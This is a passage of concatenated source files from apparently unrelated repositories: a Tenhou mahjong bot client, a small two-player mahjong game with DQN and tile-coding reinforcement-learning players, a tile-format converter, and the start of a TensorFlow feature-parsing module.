results = TilesConverter.to_34_array(results)
return results
@staticmethod
def find_34_tile_in_136_array(tile34, tiles):
"""
Our shanten calculator will operate with 34 tiles format,
after calculations we need to find calculated 34 tile
in player's 136 tiles.
For example we had 0 tile from 34 array
in 136 array it can be present as 0, 1, 2, 3
"""
if tile34 > 33:
return None
tile = tile34 * 4
possible_tiles = [tile] + [tile + i for i in range(1, 4)]
found_tile = None
for possible_tile in possible_tiles:
if possible_tile in tiles:
found_tile = possible_tile
break
return found_tile
```
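A round-trip example for the converters above, using the one-line notation described in `to_one_line_string`.
```python
tiles_136 = TilesConverter.string_to_136_array(man='123', pin='55')
print(TilesConverter.to_one_line_string(tiles_136))            # 123m55p
counts_34 = TilesConverter.to_34_array(tiles_136)
print(counts_34[0])                                            # 1 (one 1-man)
# Map a 34-format tile back into the player's 136-format tiles:
print(TilesConverter.find_34_tile_in_136_array(0, tiles_136))  # 0
```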
#### File: tenhou-bot/tenhou/client.py
```python
import datetime
import logging
import socket
from threading import Thread
from time import sleep
from urllib.parse import quote
import re
from mahjong.constants import DISPLAY_WINDS
from utils.settings_handler import settings
from mahjong.client import Client
from mahjong.meld import Meld
from mahjong.table import Table
from mahjong.tile import TilesConverter
from tenhou.decoder import TenhouDecoder
logger = logging.getLogger('tenhou')
class TenhouClient(Client):
socket = None
game_is_continue = True
looking_for_game = True
keep_alive_thread = None
decoder = TenhouDecoder()
def __init__(self):
super(TenhouClient, self).__init__(False)  # Client builds its own Table
def setSocketObject(self, socket_object):
self.socket = socket_object
def authenticate(self):
self._send_message('<HELO name="{0}" tid="f0" sx="M" />'.format(quote(settings.USER_ID)))
auth_message = self._read_message()
auth_string = self.decoder.parse_auth_string(auth_message)
if not auth_string:
return False
auth_token = self.decoder.generate_auth_token(auth_string)
self._send_message('<AUTH val="{0}"/>'.format(auth_token))
self._send_message(self._pxr_tag())
# sometimes tenhou sends an empty tag after authentication (in tournament mode)
# and the bot thinks that it was not authenticated;
# to prevent this, let's wait a little
# and read a group of tags
sleep(3)
authenticated = False
messages = self._get_multiple_messages()
for message in messages:
if '<ln' in message:
authenticated = True
if authenticated:
self._send_keep_alive_ping()
logger.info('Successfully authenticated')
return True
else:
logger.info('Failed to authenticate')
return False
def start_game(self):
log_link = ''
if settings.LOBBY != '0':
if settings.IS_TOURNAMENT:
logger.info('Go to the tournament lobby: {0}'.format(settings.LOBBY))
self._send_message('<CS lobby="{0}" />'.format(settings.LOBBY))
sleep(2)
self._send_message('<DATE />')
else:
logger.info('Go to the lobby: {0}'.format(settings.LOBBY))
self._send_message('<CHAT text="{0}" />'.format(quote('/lobby {0}'.format(settings.LOBBY))))
sleep(2)
game_type = '{0},{1}'.format(settings.LOBBY, settings.GAME_TYPE)
if not settings.IS_TOURNAMENT:
self._send_message('<JOIN t="{0}" />'.format(game_type))
logger.info('Looking for the game...')
start_time = datetime.datetime.now()
while self.looking_for_game:
sleep(1)
messages = self._get_multiple_messages()
for message in messages:
if '<rejoin' in message:
# game wasn't found, continue to wait
self._send_message('<JOIN t="{0},r" />'.format(game_type))
if '<go' in message:
self._send_message('<GOK />')
self._send_message('<NEXTREADY />')
if '<taikyoku' in message:
self.looking_for_game = False
game_id, seat = self.decoder.parse_log_link(message)
log_link = 'http://tenhou.net/0/?log={0}&tw={1}'.format(game_id, seat)
self.statistics.game_id = game_id
if '<un' in message:
values = self.decoder.parse_names_and_ranks(message)
self.table.set_players_names_and_ranks(values)
if '<ln' in message:
self._send_message(self._pxr_tag())
current_time = datetime.datetime.now()
time_difference = current_time - start_time
if time_difference.seconds > 60 * settings.WAITING_GAME_TIMEOUT_MINUTES:
break
# we weren't able to find a game within the timeout;
# sometimes this happens, and we need to end the process
# and try again later
if self.looking_for_game:
logger.error('Game is not started. Can\'t find the game')
self.end_game()
return
logger.info('Game started')
logger.info('Log: {0}'.format(log_link))
logger.info('Players: {0}'.format(self.table.players))
main_player = self.table.get_main_player()
while self.game_is_continue:
sleep(1)
messages = self._get_multiple_messages()
for message in messages:
if '<init' in message:
values = self.decoder.parse_initial_values(message)
self.table.init_round(
values['round_number'],
values['count_of_honba_sticks'],
values['count_of_riichi_sticks'],
values['dora_indicator'],
values['dealer'],
values['scores'],
)
tiles = self.decoder.parse_initial_hand(message)
self.table.init_main_player_hand(tiles)
logger.info(self.table.__str__())
logger.info('Players: {}'.format(self.table.get_players_sorted_by_scores()))
logger.info('Dealer: {}'.format(self.table.get_player(values['dealer'])))
logger.info('Round wind: {}'.format(DISPLAY_WINDS[self.table.round_wind]))
logger.info('Player wind: {}'.format(DISPLAY_WINDS[main_player.player_wind]))
# draw and discard
if '<t' in message:
tile = self.decoder.parse_tile(message)
if not main_player.in_riichi:
self.draw_tile(tile)
sleep(1)
logger.info('Hand: {0}'.format(TilesConverter.to_one_line_string(main_player.tiles)))
tile = self.discard_tile()
if 't="16"' in message:
# we win by self draw (tsumo)
self._send_message('<N type="7" />')
else:
# let's call riichi and after this discard tile
if main_player.can_call_riichi():
self._send_message('<REACH hai="{0}" />'.format(tile))
sleep(2)
main_player.in_riichi = True
# tenhou format: <D p="133" />
self._send_message('<D p="{0}"/>'.format(tile))
logger.info('Remaining tiles: {0}'.format(self.table.count_of_remaining_tiles))
# new dora indicator after kan
if '<dora' in message:
tile = self.decoder.parse_dora_indicator(message)
self.table.add_dora_indicator(tile)
logger.info('New dora indicator: {0}'.format(tile))
if '<reach' in message and 'step="2"' in message:
who_called_riichi = self.decoder.parse_who_called_riichi(message)
self.enemy_riichi(who_called_riichi)
logger.info('Riichi called by {0} player'.format(who_called_riichi))
# the end of round
if 'agari' in message or 'ryuukyoku' in message:
sleep(2)
self._send_message('<NEXTREADY />')
# t="7" - suggest to open kan
open_sets = ['t="1"', 't="2"', 't="3"', 't="4"', 't="5"', 't="7"']
if any(i in message for i in open_sets):
sleep(1)
self._send_message('<N />')
# set call
if '<n who=' in message:
meld = self.decoder.parse_meld(message)
self.call_meld(meld)
logger.info('Meld: {0}, who {1}'.format(meld.type, meld.who))
# other player upgraded pon to kan, and it is our winning tile
if meld.type == Meld.CHAKAN and 't="8"' in message:
# actually I don't know exactly what the client response should be,
# so let's try the usual ron response
self._send_message('<N type="6" />')
# other players discards: <e, <f, <g + tile number
match_discard = re.match(r"^<[efg]+\d.*", message)
if match_discard:
# we win by other player's discard
if 't="8"' in message:
self._send_message('<N type="6" />')
tile = self.decoder.parse_tile(message)
if '<e' in message:
player_seat = 1
elif '<f' in message:
player_seat = 2
else:
player_seat = 3
self.enemy_discard(player_seat, tile)
if 'owari' in message:
values = self.decoder.parse_final_scores_and_uma(message)
self.table.set_players_scores(values['scores'], values['uma'])
if '<prof' in message:
self.game_is_continue = False
logger.info('Final results: {0}'.format(self.table.get_players_sorted_by_scores()))
# we need to finish the game, and only after that try to send statistics;
# if the order is different, tenhou will return 404 on the log download endpoint
self.end_game()
# sometimes the log is not available right after the game
# let's wait one minute before the statistics update
if settings.STAT_SERVER_URL:
sleep(60)
result = self.statistics.send_statistics()
logger.info('Statistics sent: {0}'.format(result))
def end_game(self):
self.game_is_continue = False
self._send_message('<BYE />')
if self.keep_alive_thread:
self.keep_alive_thread.join()
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
logger.info('End of the game')
def _send_message(self, message):
# tenhou requires an empty byte at the end of each sent message
logger.debug('Send: {0}'.format(message))
message += '\0'
self.socket.sendall(message.encode())
def _read_message(self):
message = self.socket.recv(1024)
logger.debug('Get: {0}'.format(message.decode('utf-8').replace('\x00', ' ')))
message = message.decode('utf-8')
# sometimes tenhou sends messages in lower case, sometimes in upper case; let's unify the behaviour
message = message.lower()
return message
def _get_multiple_messages(self):
# tenhou can send multiple messages in one request
messages = self._read_message()
messages = messages.split('\x00')
# the last message is always empty after the split, so let's exclude it
messages = messages[0:-1]
return messages
def _send_keep_alive_ping(self):
def send_request():
while self.game_is_continue:
self._send_message('<Z />')
sleep(15)
self.keep_alive_thread = Thread(target=send_request)
self.keep_alive_thread.start()
def _pxr_tag(self):
# I have no idea why we need to send it, but better to do it
if settings.IS_TOURNAMENT:
return '<PXR V="-1" />'
if settings.USER_ID == 'NoName':
return '<PXR V="1" />'
else:
return '<PXR V="9" />'
```
#### File: python_app/tiny_mahjong/game_state.py
```python
import numpy as np
TILE_STACK_COUNT = 72
PLAYER_COUNT = 2
INITIAL_HAND_COUNT = 4
FULL_HAND_COUNT = INITIAL_HAND_COUNT + 1
FULL_DISCARD_COUNT = int((TILE_STACK_COUNT - PLAYER_COUNT * INITIAL_HAND_COUNT) / PLAYER_COUNT)
ADDITIONAL_FEATURES = 5
class GameState:
def __init__(self, other_player_ids, disclose_all):
self._player_hand = None
self._opponents_hands = None
self._player_discards = []
self._other_player_discards = {}
if other_player_ids is not None:
if len(other_player_ids) != 0:
self._other_player_ids = other_player_ids
for i in other_player_ids:
self._other_player_discards[i] = []
else:
raise ValueError("Empty number of player ids.")
self._disclose_all = disclose_all
def copy(self):
copy_object = GameState(None, self._disclose_all)
if self._player_hand is not None:
copy_object._player_hand = self._player_hand.copy()
if self._opponents_hands is not None:
copy_object._opponents_hands = self._opponents_hands.copy()
copy_object._player_discards = self._player_discards.copy()
copy_object._other_player_ids = self._other_player_ids.copy()
for player_id in copy_object._other_player_ids:
copy_object._other_player_discards[player_id] = self._other_player_discards[player_id].copy()
return copy_object
def calc_expectation_one_lookahead(self, model, action):
expectation = 0.0
for i in range(1, 18 + 1):
new_state = self.copy()
new_state._player_hand[action] = i
new_state._player_hand = np.sort(new_state._player_hand)
new_state._player_discards.append(i)
transition_probability = new_state.calc_tile_distribution(new_state.calc_tile_count()[1:])[i - 1]
if transition_probability == 0:
continue
state_value = np.max(model.predict_q_values(new_state))
expectation += new_state.calc_tile_distribution(new_state.calc_tile_count()[1:])[i - 1] * state_value
return expectation
# Player's hand update.
def on_player_default_hand_obtained(self, hand):
hand = np.append(hand, 0)
assert hand.shape[0] == 5
self._player_hand = hand
def on_player_pick_new_tile(self, hand):
self._player_hand = hand
# Opponents' hands update (for disclose option).
def on_other_players_hands_obtained(self, hands):
self._opponents_hands = hands
# Players' discards update.
def on_player_discard(self, tile, new_hand):
self._player_discards.append(tile)
self._player_hand = new_hand
def on_other_player_discard(self, player_id, tile, new_hand):
self._other_player_discards[player_id].append(tile)
self._opponents_hands = new_hand
# Accessors.
def get(self):
""" Get the vector of the whole state information. """
# Append player's hand.
result = np.array(self._player_hand)
# Append shanten number and tenpai count if in tenpai state.
result = np.append(result, np.array(self.calc_shanten_tenpai_tiles(self._player_hand)[:2]))
# Append count for tiles left in tile stack.
result = np.append(result, np.array([np.sum(self.calc_tile_count()[1:]) - FULL_HAND_COUNT]))
# Append major suit's tile count.
result = np.append(result, np.array([self.calc_major_suit_count()]))
# Append 2-8 tile count.
result = np.append(result, np.array([self.calc_two_to_eight_count()]))
# Append tile stack counts.
# tile_count = self.calc_tile_count()[1:]
# tile_not_appeared = np.argwhere(tile_count == 4)
# result = np.append(result, tile_not_appeared)
# result = np.append(result, np.array([0] * (18 - tile_not_appeared.shape[0])))
# Append player's discards.
result = np.append(result, self._player_discards)
# Pad with 0s for games that are not over, i.e. keep a fixed-size input sized for the maximum number of discards.
result = np.append(result, np.zeros((FULL_DISCARD_COUNT - len(self._player_discards),)))
# If the disclose option is enabled, append opponents' hands.
if self._disclose_all:
result = np.append(result, self._opponents_hands.copy())
# Append opponents' discards and fill up with 0s.
for p in self._other_player_discards:
result = np.append(result, self._other_player_discards[p])
result = np.append(result, np.zeros((FULL_DISCARD_COUNT - len(self._other_player_discards[p]),)))
# Check state size.
other_players_count = len(self._other_player_ids)
assert result.shape[0] == (other_players_count + 1) * FULL_DISCARD_COUNT + FULL_HAND_COUNT + \
self._disclose_all * other_players_count * 5 + ADDITIONAL_FEATURES
return result
def get_player_hand(self):
return self._player_hand
def get_opponents_hands(self):
return self._opponents_hands
def get_opponents_discards(self):
return self._other_player_discards
def calc_shanten_tenpai_tiles(self, hand):
"""
:return: Shanten, Tenpai count, Tenpai tiles(only applies to four tiles hand).
"""
tile_count = self.calc_tile_count(disclose=self._disclose_all)
player_hand = hand.copy()
if 0 in player_hand:
player_hand = np.delete(player_hand, np.argwhere(player_hand == 0))
# Try remove the combo first.
found_combo = False
sum_tenpai = 0
sum_tenpai_tiles = []
for i in range(player_hand.shape[0] - 2):
# Avoid duplicate initial tile.
if i > 0 and player_hand[i] == player_hand[i - 1]:
continue
if player_hand[i] == player_hand[i + 1] and player_hand[i + 1] == player_hand[i + 2]:
removed_trio_hand = player_hand.copy()
removed_trio_hand = np.delete(removed_trio_hand, i + 2)
removed_trio_hand = np.delete(removed_trio_hand, i + 1)
removed_trio_hand = np.delete(removed_trio_hand, i)
# If a trio is removed, we can derive the shanten directly.
if removed_trio_hand.shape[0] == 1:
return 1, tile_count[int(removed_trio_hand[0])], [int(removed_trio_hand[0])]
if removed_trio_hand.shape[0] == 2:
if removed_trio_hand[0] == removed_trio_hand[1]:
return 0, np.sum(tile_count[1:]), []
else:
tenpai_count = max(tile_count[int(removed_trio_hand[0])], tile_count[int(removed_trio_hand[1])])
return 1, tenpai_count, []
for j in range(i + 1, player_hand.shape[0] - 1):
if player_hand[i] <= 9 < player_hand[j] or player_hand[i] > 9 >= player_hand[j]:
# Break the loop if the suit does not match.
break
if player_hand[i] == player_hand[j] - 1:
for k in range(j + 1, player_hand.shape[0]):
if player_hand[j] <= 9 < player_hand[k] or \
player_hand[j] > 9 >= player_hand[k]:
# Break the loop if the suit does not match.
break
if player_hand[j] == player_hand[k] - 1:
removed_straight_hand = player_hand.copy()
removed_straight_hand = np.delete(removed_straight_hand, k)
removed_straight_hand = np.delete(removed_straight_hand, j)
removed_straight_hand = np.delete(removed_straight_hand, i)
# If a straight is removed, we can derive the shanten directly.
if removed_straight_hand.shape[0] == 1:
if int(removed_straight_hand[0]) not in sum_tenpai_tiles:
sum_tenpai += tile_count[int(removed_straight_hand[0])]
sum_tenpai_tiles.append(int(removed_straight_hand[0]))
found_combo = True
if removed_straight_hand.shape[0] == 2:
if removed_straight_hand[0] == removed_straight_hand[1]:
return 0, np.sum(tile_count[1:]), []
else:
sum_tenpai += \
max(tile_count[int(removed_straight_hand[0])],
tile_count[int(removed_straight_hand[1])])
found_combo = True
found_one_potential_combo = False
found_two_potential_combo = False
max_return_tenpai = -1
max_tenpai_tiles = []
for i in range(player_hand.shape[0] - 1):
# Avoid duplicate initial tile.
if i > 0 and player_hand[i] == player_hand[i - 1]:
continue
tile_i = player_hand[i]
for j in range(i + 1, player_hand.shape[0]):
tile_j = player_hand[j]
if tile_i <= 9 < tile_j or tile_i > 9 >= tile_j:
# Break the loop if the suit does not match.
break
if tile_i == tile_j + 1 or tile_i == tile_j - 1 or \
tile_i == tile_j + 2 or tile_i == tile_j - 2 or tile_i == tile_j:
found_one_potential_combo = True
remove_one_hand = player_hand.copy()
remove_one_hand = np.delete(remove_one_hand, j)
remove_one_hand = np.delete(remove_one_hand, i)
for i2 in range(remove_one_hand.shape[0] - 1):
for j2 in range(i2 + 1, remove_one_hand.shape[0]):
if remove_one_hand[i2] == remove_one_hand[j2]:
found_two_potential_combo = True
return_tenpai = None
tenpai_tiles = None
if tile_i == tile_j + 2:
return_tenpai = tile_count[int(tile_i) - 1]
tenpai_tiles = [int(tile_i) - 1]
elif tile_i == tile_j - 2:
return_tenpai = tile_count[int(tile_i) + 1]
tenpai_tiles = [int(tile_i) + 1]
elif tile_i == tile_j + 1:
return_tenpai = 0
tenpai_tiles = []
if tile_i != 1 and tile_i != 9 and tile_i != 10 and tile_i != 18:
return_tenpai += tile_count[int(tile_i) + 1]
tenpai_tiles.append(int(tile_i) + 1)
if tile_j != 1 and tile_j != 9 and tile_j != 10 and tile_j != 18:
return_tenpai += tile_count[int(tile_j) - 1]
tenpai_tiles.append(int(tile_j) - 1)
elif tile_i == tile_j - 1:
return_tenpai = 0
tenpai_tiles = []
if tile_j != 1 and tile_j != 9 and tile_j != 10 and tile_j != 18:
return_tenpai += tile_count[int(tile_j) + 1]
tenpai_tiles.append(int(tile_j) + 1)
if tile_i != 1 and tile_i != 9 and tile_i != 10 and tile_i != 18:
return_tenpai += tile_count[int(tile_i) - 1]
tenpai_tiles.append(int(tile_i) - 1)
elif tile_i == tile_j:
return_tenpai = tile_count[int(tile_i)] + tile_count[int(remove_one_hand[i2])]
tenpai_tiles = [int(tile_i), int(remove_one_hand[i2])]
if return_tenpai > max_return_tenpai:
max_return_tenpai = return_tenpai
if player_hand.shape[0] == 4:
max_tenpai_tiles = tenpai_tiles
if found_two_potential_combo:
if found_combo:
if max_return_tenpai > sum_tenpai:
return 1, max_return_tenpai, max_tenpai_tiles
else:
return 1, sum_tenpai, sum_tenpai_tiles
else:
return 1, max_return_tenpai, max_tenpai_tiles
if found_combo:
return 1, sum_tenpai, sum_tenpai_tiles
if found_one_potential_combo:
return 2, 0, []
else:
for i in range(player_hand.shape[0] - 1):
for j in range(i + 1, player_hand.shape[0]):
if player_hand[i] == player_hand[j]:
return 2, 0, []
return 3, 0, []
def calc_discarded_tile_count(self):
tile_count = np.array([4] * 19)
tile_count[0] = -123456789 # Sentinel for the unused index 0; its magnitude makes bugs obvious.
for i in self._player_discards:
tile_count[int(i)] -= 1
for i in self._other_player_discards.values():
for j in i:
tile_count[int(j)] -= 1
return tile_count
def calc_tile_count(self, disclose=False):
""" Return 19 integers where the index 0 is invalid. """
tile_count = np.array([4] * 19)
tile_count[0] = -123456789 # Sentinel for the unused index 0; its magnitude makes bugs obvious.
for i in self._player_hand:
tile_count[int(i)] -= 1
if disclose:
for i in self._opponents_hands:
tile_count[int(i)] -= 1
for i in self._player_discards:
tile_count[int(i)] -= 1
for i in self._other_player_discards.values():
for j in i:
tile_count[int(j)] -= 1
return tile_count
def calc_major_suit_count(self):
major_suit_count = 0
for i in self._player_hand:
if i <= 9:
major_suit_count += 1
if major_suit_count < int(self._player_hand.shape[0] / 2):
major_suit_count = self._player_hand.shape[0]
return major_suit_count
def calc_two_to_eight_count(self):
count = 0
for i in self._player_hand:
if i != 0 and i != 1 and i != 9 and i != 10 and i != 18:
count += 1
return count
@staticmethod
def calc_tile_distribution(tile_count):
""" Take the 18 integer list. """
return tile_count * 1.0 / np.sum(tile_count)
@staticmethod
def suit_shift(tiles):
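# Shifts second-suit tiles (10-18) up to 21-29, presumably so the suit ends up
# encoded in the tens digit, e.g. suit_shift(np.array([3, 12])) -> [3, 23].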
tiles[np.argwhere(tiles > 9)] += 11
return tiles
def get_player_discards(self):
return self._player_discards
def process_dangerousness_input(self):
processed_inputs = []
# Get tile probability distribution.
tile_distribution = self.calc_discarded_tile_count()[1:]
processed_inputs += tile_distribution.tolist()
# Calculate tiles left and A/B ratio.
opponents_and_discards = self.get_opponents_discards()
opponent_discards = []
for p in opponents_and_discards:
opponent_discards = opponents_and_discards[p]
break
tiles_left = np.sum(self.calc_tile_count()[1:])
a_ratio = 0
b_ratio = 0
for t in opponent_discards:
if t <= 9:
a_ratio += 1
else:
b_ratio += 1
opponent_discard_length = len(opponent_discards)
if opponent_discard_length == 0:
return []
a_ratio /= opponent_discard_length
b_ratio /= opponent_discard_length
processed_inputs.append(tiles_left)
processed_inputs.append(a_ratio)
processed_inputs.append(b_ratio)
# Get last five discards.
if opponent_discard_length < 5:
copy_discards = opponent_discards.copy()
for i in range(5 - opponent_discard_length):
copy_discards.insert(0, 0)
processed_inputs += copy_discards[-5:]
else:
processed_inputs += opponent_discards[-5:]
return processed_inputs
```
#### File: python_app/tiny_mahjong/play.py
```python
from adft_player import *
from random_player import *
from ui_player import *
from greedy_player import *
# from rl_players.mcnn_player import *
# from rl_players.mc_player import *
from rl_players.q_player import *
from rl_players.dqn_player import *
from rl_players.full_dqn_player import *
from safety_first_player import SafetyFirstPlayer
def main():
# player1 = UserInputPlayer("Smart Human", log_game_state=True)
# player2 = QPlayer("Q BOT 1", EVAL)
player3 = DQNPlayer("DQN BOT TRAIN", TRAIN)
# player4 = FullDQNPlayer("Full DQN BOT SELF_PLAY", SELF_PLAY, log_game_state=True)
# player5 = GreedyPlayer("Greedy BOT")
# player6 = FullDQNPlayer("Full DQN BOT", EVAL, evaluate=True, log_game_state=True)
# player7 = SafetyFirstPlayer("Safety First Bot", EVAL, log_game_state=True)
game = Game(100000, [player3, RandomPlayer("RD")], win_on_discard=True, disclose_all=False)
game.play()
if __name__ == "__main__":
main()
```
#### File: tiny_mahjong/rl_players/dqn_player.py
```python
from model_generator import tiny_mahjong_dqn_model
from prioritised_double_dqn import PrioritisedDoubleDQN
from dqn_interface import *
from game import *
DQN_WEIGHTS_FILE = "tm_dqn_weights.h5"
WIN_REWARD = 1.0
DISCARD_REWARD = -0.01
LOSE_REWARD = -1.0
HAND_SIZE = 5
class DDQNTinyMahjong(PrioritisedDoubleDQN):
def __init__(self, mode, load=True):
PrioritisedDoubleDQN.__init__(self, action_count=5, weights_file_path=DQN_WEIGHTS_FILE,
replay_memory_size=100000, mode=mode,
target_update_interval=10000, load_previous_model=load)
@staticmethod
def _pre_process(input_data):
assert len(input_data) == HAND_SIZE
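# Each of the 5 hand slots becomes an 18-way one-hot row (tile values 1-18);
# a 0 in the hand (an empty slot) leaves its row all zeros.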
reshaped_input = np.array([[0] * 18] * 5)
for tile_index in range(HAND_SIZE):
tile = int(input_data[tile_index]) - 1
if tile >= 0:
reshaped_input[tile_index][tile] = 1
reshaped_input = reshaped_input.reshape(1, 5, 18, 1)
return reshaped_input
@staticmethod
def _create_model(input_shape=None, action_count=None):
return tiny_mahjong_dqn_model()
class DQNPlayer(Player):
def __init__(self, name, mode):
Player.__init__(self, name)
self._mode = mode
self._dqn_model = DDQNTinyMahjong(mode)
self._prev_hand = None
self._prev_action = None
self._drain_rounds = 0
self._total_rounds = 0
def initial_hand_obtained(self):
Player.initial_hand_obtained(self)
self._prev_hand = None
self._prev_action = None
self._total_rounds += 1
def tile_picked(self):
Player.tile_picked(self)
training = self._prev_hand is not None and self._mode == TRAIN
if self.test_win():
if training:
self._dqn_model.notify_reward(WIN_REWARD)
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
WIN_REWARD,
self.hand,
True)
return WIN, -1
else:
if training:
self._dqn_model.notify_reward(DISCARD_REWARD)
action = self._dqn_model.make_action(self.hand)
if training:
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
DISCARD_REWARD,
self.hand,
False)
self._prev_hand = np.copy(self.hand)
self._prev_action = action
return DISCARD, action
def player_discarded(self, discarded_tile):
training = self._prev_hand is not None and self._mode == TRAIN
if self.test_win_hand(self.hand, discarded_tile):
if training:
self._dqn_model.notify_reward(WIN_REWARD)
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
WIN_REWARD,
np.append(self.hand, 0),
True)
return WIN
else:
return PASS
def game_ends(self, win, lose, self_win=False, drain=False):
Player.game_ends(self, win, lose, self_win, drain)
if lose:
training = self._prev_hand is not None and self._mode == TRAIN
if training:
if self_win:
final_reward = DISCARD_REWARD
else:
final_reward = LOSE_REWARD
if self.hand.shape[0] == 4:
self.hand = np.append(self.hand, 0)
self._dqn_model.notify_reward(final_reward)
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
final_reward,
self.hand,
True)
# Summary.
if drain:
self._drain_rounds += 1
self._dqn_model.episode_finished({"Win rate":
self.rounds_won * 1.0 / self._total_rounds,
"Lose rate":
self.rounds_lost * 1.0 / self._total_rounds,
"Drain rate":
self._drain_rounds * 1.0 / self._total_rounds})
if self._mode == PLAY:
print(self.name + ":")
if win:
print("Won!")
elif self._mode == EVAL:
print(self.name + ":")
print("Win rate:", str(self.rounds_won * 100.0 / self._total_rounds) + "%, Lose rate:",
str(self.rounds_lost * 100.0 / self._total_rounds) + "%")
elif self._mode == DEBUG:
if win:
print(self.name, "won!")
```
#### File: rl_players/TileCoder/multi_tile_coder.py
```python
import h5py
from math import sqrt
import numpy as np
SAVER_WEIGHTS_KEY = "tile_coding_tiles"
class MultiTileCoder:
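# Keeps one independent TileCoder per output dimension, so every output
# (e.g. each action value) gets its own tiled function approximation.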
def __init__(self, dims, limits, tilings, output_number, step_size=0.1, offset=lambda n: 2 * np.arange(n) + 1):
self._output_numbers = output_number
self.tile_coders = []
for i in range(output_number):
self.tile_coders.append(TileCoder(dims, limits, tilings, step_size, offset))
def predict(self, input_data):
predictions = np.zeros((input_data.shape[0], self._output_numbers))
for i in range(input_data.shape[0]):
single_prediction = []
for t in self.tile_coders:
single_prediction.append(t[input_data[i]])
predictions[i] = single_prediction
return predictions
def train_on_batch(self, Xs, Ys):
total_loss = 0
for i in range(Xs.shape[0]):
for j in range(self._output_numbers):
total_loss += sqrt((Ys[i][j] - self.tile_coders[j][Xs[i]]) ** 2)
self.tile_coders[j][Xs[i]] = Ys[i][j]
return total_loss
def get_weights(self):
return self
def set_weights(self, weights):
for i in range(len(self.tile_coders)):
self.tile_coders[i].tiles = weights.tile_coders[i].tiles[:]
def save_weights(self, file_path):
h5_file = h5py.File(file_path, "w")
for i in range(len(self.tile_coders)):
h5_file.create_dataset(SAVER_WEIGHTS_KEY + str(i), data=self.tile_coders[i].tiles)
h5_file.close()
def load_weights(self, file_path):
h5_file = h5py.File(file_path, "r")
current_index = 0
while SAVER_WEIGHTS_KEY + str(current_index) in h5_file:
self.tile_coders[current_index].tiles = h5_file[SAVER_WEIGHTS_KEY + str(current_index)][:]
current_index += 1
h5_file.close()
class TileCoder:
def __init__(self, dims, limits, tilings, step_size=0.1, offset=lambda n: 2 * np.arange(n) + 1):
offset_vec = offset(len(dims))
tiling_dims = np.array(dims, dtype=int) + offset_vec
self._offsets = offset_vec * np.repeat([np.arange(tilings)], len(dims), 0).T / float(tilings)
self._limits = np.array(limits)
self._norm_dims = np.array(dims) / (self._limits[:, 1] - self._limits[:, 0])
self._alpha = step_size / tilings
self.tiles = np.zeros(tilings * np.prod(tiling_dims))
self._tile_base_ind = np.prod(tiling_dims) * np.arange(tilings)
self._hash_vec = np.ones(len(dims), dtype=int)
for i in range(len(dims) - 1):
self._hash_vec[i + 1] = tiling_dims[i] * self._hash_vec[i]
def _get_tiles(self, x):
off_coordinates = ((x - self._limits[:, 0]) * self._norm_dims + self._offsets).astype(int)
return self._tile_base_ind + np.dot(off_coordinates, self._hash_vec)
def __getitem__(self, x):
tile_ind = self._get_tiles(x)
return np.sum(self.tiles[tile_ind])
def __setitem__(self, x, val):
tile_ind = self._get_tiles(x)
self.tiles[tile_ind] += self._alpha * (val - np.sum(self.tiles[tile_ind]))
```
#### File: python_app/utils/mahjong_hand_converter.py
```python
import numpy as np
def tile_to_byte(t):
if t[0].isdigit():
t_value = int(t[0])
else:
# Avoiding White Dragon & West Wind, so change to Bai Dragon.
if t[1] == "d" and t[0] == "w":
t_value = 6
else:
t_value = {"e": 1, "s": 2, "w": 3, "n": 4, "r": 5, "b": 6, "g": 7}[t[0]]
t_type = {"m": 0, "p": 1, "s": 2, "w": 3, "d": 3}[t[1]]
t_meld = 0
if len(t) > 2:
t_meld = int(t[2])
return t_meld << 6 | t_type << 4 | t_value
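# Packed byte layout: bits 7-6 meld flag, bits 5-4 suit type, bits 3-0 value,
# e.g. tile_to_byte("5m") == 0x05 and tile_to_byte("rd") == 0x35.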
def byte_to_tile(b):
types = ["m", "p", "s", "z"]
return str(b & 0b1111) + types[(b & 0b110000) >> 4]
def to_mahjong_hand(hand):
ret_hand = []
for i in hand:
ret_hand.append(tile_to_byte(i))
ret_hand.sort()
return ret_hand
def to_string_hand(hand):
ret_hand = []
for i in hand:
ret_hand.append(byte_to_tile(i))
return " ".join(ret_hand)
def transform_hand_to_one_hot(byte_hand):
ret_hand = []
for i in byte_hand:
if type(i).__name__ == "Tile":
i = i.get_data()
# Convert to one-hot encoding.
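# 16 bits per tile: 3 meld bits, then 4 suit-type bits, then 9 value bits,
# each group one-hot (this follows from the shifts below).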
converted_hand = 1 << (2 - ((i & 0b11000000) >> 6))
converted_hand <<= 13
converted_hand |= 1 << (3 - ((i & 0b110000) >> 4) + 9)
converted_hand |= 1 << (9 - (i & 0b1111))
ret_hand += list(bin(converted_hand)[2:].zfill(16))
return ret_hand
def transform_one_hot_to_cnn_matrix(csv_hand):
csv_hand = np.array([csv_hand])
return csv_hand.reshape(csv_hand.shape[0], 14, 16, 1)
``` |
{
"source": "0xsx/nnmaker",
"score": 3
} |
#### File: nnetmaker/loader/secondaries.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nnetmaker.util import *
def _parse_shape_and_dtype(args_dict, shapes_dict, dtypes_dict):
"""Parses the shape and dtype specified in `args_dict` and checks whether they
refer to existing tensors, and returns the dictionary key to use if so.
Otherwise parses and returns literal shape and dtype."""
args_val = ArgumentsValidator(args_dict, "Secondary feature")
with args_val:
shape = args_val.get("shape", [ATYPE_STRING, ATYPE_INTS_LIST], True)
dtype = args_val.get("dtype", ATYPE_STRING, True)
try:
shape_key = shape
static_shape = shapes_dict[shape_key]
except (KeyError, TypeError): # a list-valued shape is unhashable, so it lands here too
shape_key = None
parsed_shape = shape
if (shape[0] == "[" and shape[-1] == "]") or (shape[0] == "(" and shape[-1] == ")"):
parsed_shape = shape[1:-1]
try:
static_shape = [int(x.strip()) for x in parsed_shape.split(",")]
except:
raise ValueError("Invalid shape: %s" % shape)
try:
dtype = dtypes_dict[dtype]
except KeyError:
try:
dtype = tf.as_dtype(dtype)
except TypeError:
raise ValueError("Invalid dtype: %s" % dtype)
return shape_key, static_shape, dtype
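# Illustrative example: shape="(3, 128)" with no matching entry in shapes_dict
# yields shape_key=None, static_shape=[3, 128]; shape="frames" (an existing key)
# yields shape_key="frames", static_shape=shapes_dict["frames"].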
class OnesFeature(object):
